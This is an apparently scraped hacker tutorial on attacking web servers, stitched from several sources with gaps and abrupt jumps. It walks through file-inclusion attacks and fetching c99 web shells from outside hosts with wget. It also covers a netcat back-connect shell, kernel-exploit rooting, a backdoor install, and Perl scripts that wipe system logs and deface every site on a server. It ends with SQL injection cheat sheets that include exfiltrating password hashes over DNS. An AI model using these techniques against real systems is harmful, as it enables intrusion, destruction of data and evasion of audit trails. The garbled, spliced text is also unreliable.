Web-servers & Application Hacking

2014 Root Root-X Security 1/1/2014 Web Servers & Application Hacking

Transcript of Web-servers & Application Hacking


Part 1: Web-hacking Attacks

This is a tutorial about web-hacking methods that I and many other hackers have collected. I thought that many people would learn a lot from this here.

Guide content:
- Remote file inclusion
- Local file inclusion
- LFI 2 RCE
- LFI 2 RCE Using Firefox
- Local file download
- Full path disclosure
- Command Injection Vulnerability Exploit
- SQL Injection - with load file
- MSSQL Injection
- Blind SQL Injection
- Postgre SQL Injection
- Error based Postgre SQL Injection
- SQL Injection on ASPX
- Dot net nuke
- XSS
- CRLF
- CSRF
- Server Side Includes | Server Side Inclusion
- Symlink Attack
- Sql injection String & Union based
- Xpath Injection
- LDAP Injection
- DNS Zone Transfer Vulnerability Exploit
- Oracle Padding Attack Using Burp Suite

So let's get started!

Remote file inclusion:

1) RFI
RFI (Remote File Inclusion) is a type of web attack. It occurs when a PHP script uses the include() function on a file name taken from a GET parameter. The included file is usually a txt page whose content is printed. Example:
Code: http://www.site.com/index.php?page=home

Nowadays RFI is rarely found, and all you need to use it on a vulnerable site is a shell in txt format.

2) Vulnerable script
Code:

3) Exploiting the vulnerability
We have the site:
Code: http://www.site.com/index.php?page=home

Now instead of home we are going to use our shell. So we get:
Code: http://www.site.com/index.php?page=www.shell-link.com/shell.txt?

If the site is vulnerable it should show the shell with a list of files from the site you are attacking.

4) Null byte bypass
In some scripts there is a weak protection which includes the file and adds an html extension, or some other:
Code:

In that case we are going to use the null byte bypass (%00). Everything after %00 is not counted or used. We also use %00 for the picture-upload bypass as php, but I am not going to talk about that here.

So the link should look like this:
Code: http://www.site.com/index.php?page=www.shell-link.com/shell.txt?%00

5) Protection script
The script should look like this:
Code:

So we are going to add some checks to protect it:
Code:

Tamper Data: click Start Tamper, then refresh the page and in the User-Agent put the following code:
Code:

Click OK. To access the shell use:
Code: www.link.com/shell.php

LFI 2 RCE
Find an LFI vulnerable site.

Check its link.

Do -> http://www.site.com/index.php?lien=../../../../../../../../../../../../proc/self/environ

Open a command prompt and run the script LFI2RCE.exe [C:\lfi2rce.exe "<website vuln link>"]

Type Command -: id
Type Command -: uname -a
Type Command -: ls -l

Now upload a "shell" to this web server:
Type Command -: wget http://downlading-link-of-shell.com/c99.php or /c99.zip
Type Command -: unzip c99.txt.zip
Type Command -: mv c99.txt c99.php "OR" mv c99.txt Out14ws.php (assuming "out14ws.php" is a public HTML page; the move command will copy the c99.txt text to "opt14ws.php")
Type Command -: ls | grep Out14ws "OR" ls | grep c99
Type Command -: pwd [to check the present working directory of the shell]
Then open the full link of your shell in your web browser and you get:
http://website-name/path/path/c99.php
http://website-name/path/path/opt14ws.php.php

LFI 2 RCE Using Firefox
Check whether the target is vulnerable to LFI or not. E.g.
http://www.site.com/index.php?page=../../../../../../../../etc/passwd
-: or
http://www.site.com/index.php?page=../../../../../../../../etc/passwd%00

Now see -:
http://www.site.com/index.php?page=../../../../../../proc/self/environ
-: or
http://www.site.com/index.php?page=../../../../../../proc/self/environ%00

Now in the Firefox address bar type: about:config

Find -: accessibility.browsewithcaret > right click > New > String

NEW STRING VALUE : general.useragent.override
Press "Ok"; a new box will pop up asking for: ENTER STRING VALUE

ENTER STRING VALUE : It is general.useragent.override

After it you will see something like:

Now check the PHP version and information while refreshing the vulnerable link or page. Find the disabled functions -: disable_functions - system, passthru, shell_exec, popen, escapeshellcmd, proc_open etc...

Once you have checked the php info go to the about:config page, look for "general.useragent.override" and ENTER STRING VALUE: on behalf of - YOUR COMMAND - type some command like ls -a, uname -a, cd /etc/passwd, pwd, etc... For uploading a shell you can type the command: wget http://www.site.com/c99.php

Note: after putting in a command, to get its output you have to refresh the page or vulnerable link.

Command -: ls -la

Output: on refreshing the page

Command : uname -a

Local file download :

1) LFD?
LFD (Local File Download) is a vulnerability in a script which is used to download files using the GET method, but you can also use it with the POST method using the add-on Tamper Data.
Code: http://site.com/download_file.php?file=notepad.exe

2) Vulnerable script
Code:

3) Vulnerability check

To check if the script is vulnerable we are going to try to download etc/passwd. So instead of:
Code: http://site.com/download_file.php?file=notepad.exe

We are going to use:
Code: http://site.com/download_file.php?file=../../../../../../../../../etc/passwd

If it starts to download and, when opened in a text editor, the file looks something like this:
Code:
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin

the script is vulnerable!
NOTE: If it is a Windows server use boot.ini instead of etc/passwd.

4) Exploiting vulnerability

Now that we know the script is vulnerable, we want to see which files are on the host. You can do this the following way:
Code: http://site.com/download_file.php?file=../

../ takes us one directory backward and downloads the file.

1.1 It is possible that when it downloads the file and you open it in a text editor, it prints the file list of the directory.
1.2 Or it is possible that it downloads the file, but when it is opened in a text editor the file is empty.

In case 1.1 we don't have to guess file names and directories and we can download whatever we want. In case 1.2 we must guess the file name and directory and we can download only files whose names we guess. There are a few programs that can help us to find files (Acunetix and HTTrack Website Copier).

5) Protection script

We have the script mentioned at the start:
Code:

By adding if(file_exists("download/".$file)) we are going to secure the script. So it should look like:
Code:
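The protection step above, as an added example that is not the tutorial's own code: a Python resolver doing the job of the PHP download script. A bare file_exists("download/".$file) check does not stop traversal, because "download/../../etc/passwd" exists too; the checks below refuse traversal, %00 terminators and absolute paths, and the directory and file names are constructed for the demo.

```python
"""Hardened download resolver, as an added example (not the tutorial's code).

Plays the role of download_file.php from the LFD section, but keeps every
download inside one directory. It refuses "../" escapes (also via symlinks),
%00 terminators and absolute paths. Names used in demo() are constructed.
"""
import os
import tempfile
from pathlib import Path
from urllib.parse import unquote


class DownloadRefused(ValueError):
    """Raised for any requested name that must not be served."""


def resolve_download(base_dir, requested):
    """Map a user-supplied ?file= value to a real file under base_dir.

    `requested` is the raw query-string value, still URL-encoded, so a
    "%00" becomes a real NUL here, exactly as the web server would decode it.
    """
    name = unquote(requested)
    if "\x00" in name:
        # Older PHP truncated the path at the NUL (the "shell.txt?%00" trick);
        # never let such a name reach the filesystem at all.
        raise DownloadRefused("null byte in file name")
    if os.path.isabs(name):
        raise DownloadRefused("absolute path")
    base = Path(base_dir).resolve()
    # resolve() canonicalises every "../" and follows symlinks, so a link
    # that points outside base_dir is caught as well as a literal traversal.
    candidate = (base / name).resolve()
    try:
        candidate.relative_to(base)
    except ValueError:
        raise DownloadRefused("path escapes download directory") from None
    if candidate == base or not candidate.is_file():
        # "../" style listings and directories are never downloadable.
        raise DownloadRefused("not a regular file in download directory")
    return candidate


def check(base_dir, requested):
    """Return ("ok", path) or ("refused", reason) instead of raising."""
    try:
        return "ok", str(resolve_download(base_dir, requested))
    except DownloadRefused as exc:
        return "refused", str(exc)


def demo():
    """Run the requests from the LFD section against a constructed directory."""
    with tempfile.TemporaryDirectory() as tmp:
        download = Path(tmp) / "download"
        download.mkdir()
        (download / "notepad.exe").write_bytes(b"MZ constructed sample")
        requests = [
            "notepad.exe",                                # legitimate
            "../../../../../../../../../etc/passwd",      # traversal
            "../",                                        # listing attempt
            "notepad.exe%00.txt",                         # null byte
            "/etc/passwd",                                # absolute path
            "download/../notepad.exe",                    # stays inside: allowed
        ]
        return {req: check(str(download), req)[0] for req in requests}


if __name__ == "__main__":
    for req, verdict in demo().items():
        print(f"{verdict:8} {req}")
```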

Simply replace '' with the path to read and let the requests rip, like so:

Now the cool thing here is that it works regardless of OS, since it is due to how the Data Services handle and parse the XML data being passed; just make sure you request the proper file type for the designated system type (check the server response if you have no idea)...

Also, in addition to reading files, you can simply pass a directory and it will spit back the directory content, making it very easy to map things out and find files worth reading. Limited privileges may restrict some file reading, but it is still plenty enough to cause trouble, enumerate lots of info, and possibly even read the site configuration details...

In addition to these named exploits in this Cold Fusion series, the same old usual suspects are still fair game here. SQL injection vulnerabilities are just as common as on PHP or ASP based sites, and 'cfincludes' can enable source disclosures. In many cases the db can be compromised and Java commands may be leveraged to further extend the potential attack vectors and escalation platform beyond that of a standard injection, so keep your eyes out and don't be afraid to take on a new site just because it has .CFM or .JSP files instead of the oh so popular .PHP or .ASP. Hope you enjoyed this short series on hacking Cold Fusion Servers. All material for the series was available on the net in various places; all I did was wrap it up for you and try to make it a little easier to understand. If you have any questions or suggestions please post them here or let me know via PM.

LFI exploitation via php://input [Shelling Sites]

Hey guys, today I'll be explaining how to shell a website using the "php://input" method via LFI.

So let's get started. Now let's have our target, shall we. As an example, your target URL should look like this:
Code: http://www.site.com/index.php?page=
You can have anything similar to that as long as you are able to read files and obtain an "include" error.

First things first, give it a shot and see if you can read "/etc/passwd"

The URL will look like:
Code: http://www.site.com/index.php?page=/etc/passwd
If successful, you'll get a page that looks like this:

Now let's try reading:
Code: /proc/self/environ
/proc/self/fd
So the URL will become:
Code: http://www.site.com/index.php?page=/proc/self/environ
http://www.site.com/index.php?page=/proc/self/fd
Hmm, seems like nothing is being displayed, even though I've added a null byte at the end of the URL.

Well, not to worry, it's time to use our backup method. The "php://input" method will let us read files with certain commands, and hence enables us to upload a shell. This can be done using the "Hackbar" or by using "Live HTTP headers".

I'll show you how to exploit via php://input using the "Hackbar"

So let's check what we're supposed to use in the Hackbar.

Now let's try putting this method into action. Look at the picture carefully.

The URL will be:
Code: http://www.site.com/index.php?page=php://input
and POST DATA:
Code:

Other commands
List directories
Code:
Identification
Code:

Convert format
Code:

Alright, let's spawn a shell there now shall we.

Grab a shell from sh3ll.org or anywhere else. For now, we'll be using the normal c99 shell
Code: http://www.sh3ll.org/c99.txt?

Let's use the "wget" command to spawn our shell on the site.

So our POST DATA will be:
Code:

This is how it's going to look.

Now that you've spawned a shell, you can navigate to your shell on the site.
Code: http://www.site.com/shell.php
You can watch a video tutorial below so that it'll be easier to understand. Have fun.
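From the defender's side, the requests used in the LFI 2 RCE, LFI via Firefox and php://input sections all leave recognisable traces in the web server's access log. The following is an added example, not part of the original post: it scans constructed Apache combined-format lines for "../" chains, /proc/self/environ or /proc/self/fd, php:// wrappers, %00 terminators, a remote URL in a parameter (RFI) and PHP tags in the User-Agent; the IPs and hostnames in the sample are placeholders.

```python
"""Access-log detector for the LFI/RFI traffic shown in this tutorial.

Added example, not from the original post. Scans Apache combined-format
lines (constructed below) for the request shapes the tutorial uses.
"""
import re
from collections import defaultdict
from urllib.parse import unquote

# Rules applied to the URL-decoded request target.
PATH_RULES = [
    ("path_traversal", re.compile(r"(\.\./){2,}|(\.\.\\){2,}")),
    ("proc_environ", re.compile(r"/proc/self/(environ|fd)")),
    ("php_wrapper", re.compile(r"php://(input|filter)", re.IGNORECASE)),
    ("null_byte", re.compile("\x00")),
    ("remote_include", re.compile(r"[?&][A-Za-z_]+=(https?://|//)")),
    ("sensitive_file", re.compile(r"/etc/passwd|boot\.ini", re.IGNORECASE)),
]
# Rules applied to the raw User-Agent (the header that ends up in /proc/self/environ).
UA_RULES = [
    ("php_in_user_agent", re.compile(r"<\?php|<\?=", re.IGNORECASE)),
]

# Apache "combined" format: ip ident user [time] "request" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Constructed sample lines; IPs and hostnames are placeholders.
SAMPLE_LOG = """\
203.0.113.5 - - [01/Jan/2014:10:00:01 +0000] "GET /index.php?page=home HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [01/Jan/2014:10:00:02 +0000] "GET /index.php?page=../../../../../../../../etc/passwd%00 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.5 - - [01/Jan/2014:10:00:03 +0000] "GET /index.php?page=../../../../../../proc/self/environ HTTP/1.1" 200 8192 "-" "<?php echo 'x'; ?>"
203.0.113.5 - - [01/Jan/2014:10:00:04 +0000] "POST /index.php?page=php://input HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [01/Jan/2014:10:00:05 +0000] "GET /index.php?page=http://www.shell-link.com/shell.txt? HTTP/1.1" 200 7000 "-" "Mozilla/5.0"
198.51.100.7 - - [01/Jan/2014:10:00:06 +0000] "GET /download_file.php?file=notepad.exe HTTP/1.1" 200 40960 "-" "Mozilla/5.0"
"""


def decode_target(target):
    """Decode twice: %2500 -> %00 -> NUL, and double-encoded traversals."""
    return unquote(unquote(target))


def analyse_line(line):
    """Return {"ip", "target", "hits"} for a parseable line, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    decoded = decode_target(m["target"])
    hits = [name for name, rx in PATH_RULES if rx.search(decoded)]
    hits += [name for name, rx in UA_RULES if rx.search(m["ua"])]
    return {"ip": m["ip"], "target": m["target"], "hits": hits}


def scan(lines):
    """Return only the parsed lines that triggered at least one rule."""
    results = []
    for line in lines:
        parsed = analyse_line(line)
        if parsed and parsed["hits"]:
            results.append(parsed)
    return results


def hits_by_ip(results):
    """Group triggered rule names per source IP, for a quick triage view."""
    grouped = defaultdict(set)
    for r in results:
        grouped[r["ip"]].update(r["hits"])
    return {ip: sorted(names) for ip, names in grouped.items()}


if __name__ == "__main__":
    found = scan(SAMPLE_LOG.splitlines())
    for r in found:
        print(r["ip"], ",".join(r["hits"]), r["target"])
    print(hits_by_ip(found))
```

The User-Agent rule matters because the code injected there is what /proc/self/environ later hands to include(); the raw header is logged verbatim, so it is visible before any refresh executes it.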

Server Rooting Via Shell and Mass defacement script
Now let's kill the root:

Getting a back connection to the server
Copy the Netcat directory to C:\. Open a command prompt and type: cd C:\NETCAT
It'll look like this:

Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Users\kislay>cd c:\netcat

c:\netcat>

Now type: nc -l -v -p 2121
It'll look like:

c:\netcat>nc -l -v -p 2121
listening on [any] 2121 ...

Open your shell in your browser and go to the back connection tab; if it is not there, get a shell like "B374k" or any other, that's your choice.

Specify your IP and the port as 2121, press connect, and you'll get a shell to the server; you can give commands to the server through that shell.

Getting the right exploit for the server

Type: uname -a and hit enter.

It'll look something like this:

[[email protected] /home/saijyoti/public_html/cgi-bin]$ uname -a
Linux dualxeon09.ns5.999servers.com 2.6.18-194.26.1.el5 #1 SMP Tue Nov 9 12:54:20 EST 2010 x86_64 x86_64 x86_64 GNU/Linux

It shows the kernel version of the server is 2.6.18-194.26.1.el5 and the year is 2010. You need to find a suitable exploit for it. You can find them at:

# Exploit-db.com
# Packetstormsecurity.org
# Th3-0utl4ws.com
# Leetupload.com
# r00tw0rm.com

Compiling & executing the exploit
Now I've got an exploit, and it is written in C. So I can't execute it by just uploading it; I need to compile it. Before proceeding further, cd into the tmp directory, because it is always writable. So type: cd /home/XXXXX/public_html/tmp

// The path can be different, replace it with yours.
So first I'll get the exploit onto the server, so I type: wget http://exploitsite.net/exploits/my_exploit.c

// Note: there is no such site, I'm just using it to show you.
It'll look something like this:

[[email protected] /home/saijyoti/public_html/tmp]$ wget http://exploitsite.net/exploits/my_exploit.c
--2011-01-25 08:21:43-- http://exploitsite.net/exploits/my_exploit.c
Resolving www.exploitsite.net... 120.139.90.84
Connecting to www.exploitsite.net|120.139.90.84|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 15088 (15K) [text/x-csrc]
Saving to: `my_exploit.c'

0K .......... .... 100% 189K=0.08s

2011-01-25 08:21:44 (189 KB/s) - `my_exploit.c' saved [15088/15088]

Now change the permissions of the exploit to 777.

Type: chmod 777 my_exploit.c
It may look like:

[admin@www. targetsite.com /home/targetsite/public_html/tmp]$ chmod 777 ImpelDown.c

Now the exploit is on my server; I just need to compile and execute it. So I'll give the command: gcc -o exploit exploit.c
It'll compile and save the exploit as exploit. It may look like:

[[email protected] /home/targetsite/public_html/tmp]$ gcc -o exploit exploit.c

The next step is to execute it, so we'll type: ./exploit
It may look like:

[[email protected] /home/targetsite/public_html/tmp]$ gcc -o ImpelDown.c
Now it says got root. Let's check whether it's true. Type: id
It may look like: uid=0(saijyoti) gid=0(saijyoti) groups=0(root)
Which means I got root :)

Installing Backdoor
Type: wget urlofbackdoor.com/sshdoor.zip
Then type: unzip sshdoor.zip
Then type: ./run pass port
^ replace pass with your password, and a port. Now connect with putty and enjoy root privileges. ;)

Methods to execute exploits written in other languages
#C exploit
gcc -o exploit exploit.c
chmod +x exploit
./exploit
#Perl
perl exploit.pl
#python
python exploit.py
#php
php exploit.php
#zip
unzip exploit.zip
./run

Cleaning Logs# you can use my log cleaner to clear your track :D. It is written in perl. save it asanything.pl& to execute type: perl anything.plhere is the code-[perl]

#!usr/bin/perl -w #Warnings enabled!#Log cleaner version Public#Give Credits Where Needed - Kouros!#This took time, Hope you fucking use it :D#Report bugs to [email protected]#NOTE - YOU MUST BE ROOT!print qq^##################################### Log Cleaner 3.0 PUBLIC ## Kouros ## ## Virangar Security Team ## http://www.Kouros-bl4ckhat.com #####################################^;while(1) {print "Enter Which OS: "; #User Inputchomp($os = ); #Takes it into memoryif($os eq "help"){print "[+]Enter Your OS! Choose from 'linux', 'aix', 'sunos', 'irix'\n";print "[+]Hit enter with OS, Let the script do its work\n";print "[+]Note: You MUST Be Root!\n";print "[+]Contact Info[at]Kouros-bl4ckhat [dot] Com";print "[+]For Bug finds... Have Fun!\n";print "[+] - Kouros";}if($os eq "linux"){ #If linux typed, do the following and start bracketsforeach my $logphile(@linux) {unlink($logphile) || print "[-]Fucked up: \"$logphile\" : $!\n";}} elsif($os eq "sunos"){ #If sunos typed, do the following and start bracketsforeach my $logphile(@sunos) {unlink($logphile) || print "[-] Fucked up: \"$logphile\" : $!\n";}} elsif($os eq "aix"){ #If aix typed, do the following and start bracketsforeach my $logphile(@aix) {unlink($logphile) || print "[-] Fucked up: \"$logphile\" : $!\n";}} elsif($os eq "irix"){ #If irix typed, do the following and start bracketforeach my $logphile(@irix) {unlink($logphile) || print "[-] Fucked up: \"$logphile\" : $!\n";}} else { print"Umm WTF !?\n"; }#Logs of Irix Systems{ #Start Irix Bracket@irix = ("/var/adm/SYSLOG", "/var/adm/sulog", "/var/adm/utmp", "/var/adm/utmpx","/var/adm/wtmp", "/var/adm/wtmpx", "/var/adm/lastlog/","/usr/spool/lp/log", "/var/adm/lp/lp-errs", "/usr/lib/cron/log","/var/adm/loginlog", "/var/adm/pacct", "/var/adm/dtmp","/var/adm/acct/sum/loginlog", "var/adm/X0msgs", "/var/adm/crash/vmcore","/var/adm/crash/unix") #End Array} #End Irix Bracket#Log sof Aix Systems{ #Start Aix Bracket@aix = ("/var/adm/pacct", "/var/adm/wtmp", "/var/adm/dtmp", 
"/var/adm/qacct","/var/adm/sulog", "/var/adm/ras/errlog", "/var/adm/ras/bootlog","/var/adm/cron/log", "/etc/utmp", "/etc/security/lastlog","/etc/security/failedlogin", "usr/spool/mqueue/syslog") #End Array} #End Aix Bracket#Logs of SunOS Systems{ #Start SunOS Bracket@sunos = ("/var/adm/messages", "/var/adm/aculogs", "/var/adm/aculog","/var/adm/sulog", "/var/adm/vold.log", "/var/adm/wtmp","/var/adm/wtmpx", "/var/adm/utmp", "/var/adm/utmpx","/var/adm/log/asppp.log", "/var/log/syslog","/var/log/POPlog", "/var/log/authlog", "/var/adm/pacct","/var/lp/logs/lpsched", "/var/lp/logs/requests","/var/cron/logs", "/var/saf/_log", "/var/saf/port/log") #End Array} #End Sunos bracket#Logs of Linux Systems{ #Start Linux Bracket@linux = ("/var/log/lastlog", "/var/log/telnetd", "/var/run/utmp","/var/log/secure","/root/.ksh_history", "/root/.bash_history","/root/.bash_logut", "/var/log/wtmp", "/etc/wtmp","/var/run/utmp", "/etc/utmp", "/var/log", "/var/adm","/var/apache/log", "/var/apache/logs", "/usr/local/apache/logs","/usr/local/apache/logs", "/var/log/acct", "/var/log/xferlog","/var/log/messages/", "/var/log/proftpd/xferlog.legacy","/var/log/proftpd.xferlog", "/var/log/proftpd.access_log","/var/log/httpd/error_log", "/var/log/httpsd/ssl_log","/var/log/httpsd/ssl.access_log", "/etc/mail/access","/var/log/qmail", "/var/log/smtpd", "/var/log/samba","/var/log/samba.log.%m", "/var/lock/samba", "/root/.Xauthority","/var/log/poplog", "/var/log/news.all", "/var/log/spooler","/var/log/news", "/var/log/news/news", "/var/log/news/news.all","/var/log/news/news.crit", "/var/log/news/news.err","/var/log/news/news.notice","/var/log/news/suck.err", "/var/log/news/suck.notice","/var/spool/tmp", "/var/spool/errors", "/var/spool/logs", "/var/spool/locks","/usr/local/www/logs/thttpd_log", "/var/log/thttpd_log","/var/log/ncftpd/misclog.txt", "/var/log/nctfpd.errs","/var/log/auth") #End array} #End linux bracket} #Ends Loop[/perl] Mass deface I've a perl to mass deface sites on the server. 
execute it as the same way as above.[perl]# MSRml V 0.1 ## ## MOROCCO.SECURITY.RULZ mass defacer and log eraser ## ## coded by PRI[ll ## ## !!!!PRIV8!!!!!PRIV8!!!!!PRIV8!!!!!PRIV8!!!! ## ## 05/07/2005 ## ## usage : perl MSRml.pl ## ## example : perl MSRml.pl /tmp/index.html ## ## [email protected] ##!/usr/bin/perluse strict;my $index = $ARGV[0];if ($ARGV[0]){if( -e $index ){system "echo -e "33[01;34mStarted MSRml V0.1 by PRI[ll Ok !!33[01;37m"n";system "echo -e "\033[01;37mDefacing all homepages ..."n";system "find / -name "index*" -exec cp $index {} \;";system "find / -name "main*" -exec cp $index {} \;";system "find / -name "home*" -exec cp $index {} \;";system "find / -name "default*" -exec cp $index {} \;";system "echo -e "\033[01;37m[+] done ! all sites in this box are defaced !"n";system "echo -e "\033[01;37m----------------------------------------------------------"n";system "echo -e "\033[01;37mCleaning up logs ..."n";system "echo -e "33[01;34m---------erasing default log files (too fast=))---------33[01;37m"n";if( -e "/var/log/lastlog" ){system 'rm -rf /var/log/lastlog';system "echo -e "\033[01;37m [*]/var/log/lastlog -erased Ok"n";}else{system "echo -e "\033[01;31m[*]/var/log/lastlog - No such file or directory\033[01;37m"n";}if( -e "/var/log/wtmp" ){system 'rm -rf /var/log/wtmp';system "echo -e "\033[01;37m [*]/var/log/wtmp -erased Ok"n";}else{system "echo -e "\033[01;31m[*]/var/log/wtmp - No such file or directory\033[01;37m"n";}if( -e "/etc/wtmp" ){system 'rm -rf /etc/wtmp';system "echo -e "\033[01;37m [*]/etc/wtmp -erased Ok"n";}else{system "echo -e "\033[01;31m[*]/etc/wtmp - No such file or directory\033[01;37m"n";}if( -e "/var/run/utmp" ){system 'rm -rf /var/run/utmp';system "echo -e "\033[01;37m [*]/var/run/utmp -erased Ok"n";}else{system "echo -e "\033[01;31m[*]/var/run/utmp - No such file or directory\033[01;37m"n";}if( -e "/etc/utmp" ){system 'rm -rf /etc/utmp';system "echo -e "\033[01;37m [*]/etc/utmp -erased Ok"n";}else{system "echo -e 
"\033[01;31m[*]/etc/utmp - No such file or directory\033[01;37m"n";}if( -e "/var/log" ){system 'rm -rf /var/log';system "echo -e "\033[01;37m [*]/var/log -erased Ok"n";}else{system "echo -e "\033[01;31m[*]/var/log - No such file or directory\033[01;37m"n";}if( -e "/var/logs" ){system 'rm -rf /var/logs';system "echo -e "\033[01;37m [*]/var/logs -erased Ok"n";}else{system "echo -e "\033[01;31m[*]/var/logs - No such file or directory\033[01;37m"n";}if( -e "/var/adm" ){system 'rm -rf /var/adm';system "echo -e "\033[01;37m [*]/var/adm -erased Ok"n";}else{system "echo -e "\033[01;31m[*]/var/adm - No such file or directory\033[01;37m"n";}if( -e "/var/apache/log" ){system 'rm -rf /var/apache/log';system "echo -e "\033[01;37m [*]/var/apache/log -erased Ok"n";}else{system "echo -e "\033[01;31m[*]/var/apache/log - No such file or directory\033[01;37m"n";}if( -e "/var/apache/logs" ){system 'rm -rf /var/apache/logs';system "echo -e "\033[01;37m [*]/var/apache/logs -erased Ok"n";}else{system "echo -e "\033[01;31m[*]/var/apache/logs - No such file or directory\033[01;37m"n";}-10-C:\Users\kislay\Desktop\rooted.txt 25 January 2011 20:54if( -e "/usr/local/apache/log" ){system 'rm -rf /usr/local/apache/log';system "echo -e "\033[01;37m [*]/usr/local/apache/log -erased Ok"n";}else{system "echo -e "\033[01;31m[*]/usr/local/apache/log - No such file ordirectory\033[01;37m"n";}if( -e "/usr/local/apache/logs" ){system 'rm -rf /usr/local/apache/logs';system "echo -e "\033[01;37m [*]/usr/local/apache/logs -erased Ok"n";}else{system "echo -e "\033[01;31m[*]/usr/local/apache/logs - No such file ordirectory\033[01;37m"n";}if( -e "/root/.bash_history" ){system 'rm -rf /root/.bash_history';system "echo -e "\033[01;37m [*]/root/.bash_history -erased Ok"n";}else{system "echo -e "\033[01;31m[*]/root/.bash_history - No such file or directory\033[01;37m"n";}if( -e "/root/.ksh_history" ){system 'rm -rf /root/.ksh_history';system "echo -e "\033[01;37m [*]/root/.ksh_history -erased Ok"n";}else{system 
"echo -e "\033[01;31m[*]/root/.ksh_history - No such file or directory\033[01;37m"n";}system "echo -e "\033[01;37m[+] -----done all default log and bash_history files erased !!"n";system "echo -e "33[01;34m---------Now Erasing the rest of the machine log files (can belong :S)---------33[01;37m"n";system 'find / -name *.bash_history -exec rm -rf {} ;';system "echo -e "\033[01;37m[*] all *.bash_history files -erased Ok!"n";system 'find / -name *.bash_logout -exec rm -rf {} ;';system "echo -e "\033[01;37m[*] all *.bash_logout files -erased Ok!"n";system 'find / -name "log*" -exec rm -rf {} ;';system "echo -e "\033[01;37m[*] all log* files -erased Ok!"n";system 'find / -name *.log -exec rm -rf {} ;';system "echo -e "\033[01;37m[*] all *.log files -erased Ok!"n";system "echo -e "33[01;34m-------[+] !done all log files erased![+]-------33[01;37m"n";system "echo -e "33[01;34m---------------------------------------------------33[01;37m"n";system "echo -e "33[01;34m-----------------MSRml V 0.1----------------------33[01;37m"n";}else{system "echo -e "\033[01;31m[-] Failed ! the path to u're index could not be found!\033[01;37m"n";exit;}}else{system "echo -e "\033[01;37m!!Morocco.Security.Rulz mass defacer and log eraser !!"n";system "echo -e "\033[01;37m!!!!!!!!!!!!!!!!!!coded by PRI[ll!!!!!!!!!!!!!!!!!!!!!!!!"n";system "echo -e"\033[01;31m!!!!!!!!PRIV8!!!!!!!!PRIV8!!!!!!!!PRIV8!!!!!!!!PRIV8!!!!!!!!\033[01;37m"n";system "echo -e "\033[01;37musage : perl $0 CharSELECT char(041) returns A

Char -> ASCII Value
SELECT ascii('A') -- returns 65

Casting
SELECT CAST('1' as int);
SELECT CAST(1 as char)

String Concatenation
SELECT 'A' + 'B' -- returns AB

If Statement
IF (1=1) SELECT 1 ELSE SELECT 2 -- returns 1

Case Statement
SELECT CASE WHEN 1=1 THEN 1 ELSE 2 END -- returns 1

Avoiding Quotes
SELECT char(65)+char(66) -- returns AB

Time Delay
WAITFOR DELAY '0:0:5' -- pause for 5 seconds

Make DNS Requests
declare @host varchar(800); select @host = name FROM master..syslogins; exec('master..xp_getfiledetails ''\\' + @host + '\c$boot.ini'''); -- nonpriv, works on 2000
declare @host varchar(800); select @host = name + '-' + master.sys.fn_varbintohexstr(password_hash) + '.2.pentestmonkey.net' from sys.sql_logins; exec('xp_fileexist ''\\' + @host + '\c$boot.ini'''); -- priv, works on 2005
NB: Concatenation is not allowed in calls to these SPs, hence why we have to use @host. Messy but necessary. Also check out the DNS tunnel feature of sqlninja.

Command Execution
EXEC xp_cmdshell 'net user'; -- priv
On MSSQL 2005 you may need to reactivate xp_cmdshell first as it's disabled by default:
EXEC sp_configure 'show advanced options', 1; -- priv
RECONFIGURE; -- priv
EXEC sp_configure 'xp_cmdshell', 1; -- priv
RECONFIGURE; -- priv

Local File Access
CREATE TABLE mydata (line varchar(8000));
BULK INSERT mydata FROM 'c:\boot.ini';
DROP TABLE mydata;

Hostname, IP Address
SELECT HOST_NAME()

Create Users
EXEC sp_addlogin 'user', 'pass'; -- priv

Drop Users
EXEC sp_droplogin 'user'; -- priv

Make User DBA
EXEC master.dbo.sp_addsrvrolemember 'user', 'sysadmin'; -- priv

Location of DB files
EXEC sp_helpdb master; -- location of master.mdf
EXEC sp_helpdb pubs; -- location of pubs.mdf

Default/System Databases
northwind
model
msdb
pubs -- not on sql server 2005
tempdb

Misc Tips
In no particular order, here are some suggestions from pentestmonkey readers.
From Dan Crowley: A way to extract data via SQLi with a MySQL backend.
From Jeremy Bae: Tip about sp_helpdb, included in table above.
From Trip: List DBAs (included in table above now):
select name from master..syslogins where sysadmin = 1
From Daniele Costa: Tips on using fn_my_permissions in 2005, 2008, included in table above. Also: to check permissions on multiple databases you will have to use the following pattern.
USE [DBNAME]; select permission_name FROM fn_my_permissions (NULL, 'DATABASE')
Note also that in case of using this data with a UNION query a collation error could occur. In this case a simple trick is to use the following syntax:
select permission_name collate database_default FROM fn_my_permissions (NULL, 'DATABASE')

MySQL SQL Injection Cheat Sheet
Some useful syntax reminders for SQL Injection into MySQL databases.
This post is part of a series of SQL Injection Cheat Sheets. In this series, I've endeavoured to tabulate the data to make it easier to read and to use the same table for each database backend. This helps to highlight any features which are lacking for each database, enumeration techniques that don't apply, and also areas that I haven't got round to researching yet. The complete list of SQL Injection Cheat Sheets I'm working on is: Oracle, MSSQL, MySQL, PostgreSQL, Ingres, DB2, Informix. I'm not planning to write one for MS Access, but there's a great MS Access Cheat Sheet here. Some of the queries in the table below can only be run by an admin. These are marked with "priv" at the end of the query.

Version
SELECT @@version

Comments
SELECT 1; #comment
SELECT /*comment*/1;

Current User
SELECT user();
SELECT system_user();

List Users
SELECT user FROM mysql.user; -- priv

List Password Hashes
SELECT host, user, password FROM mysql.user; -- priv

Password Cracker
John the Ripper will crack MySQL password hashes.

List Privileges
SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges; -- list user privs
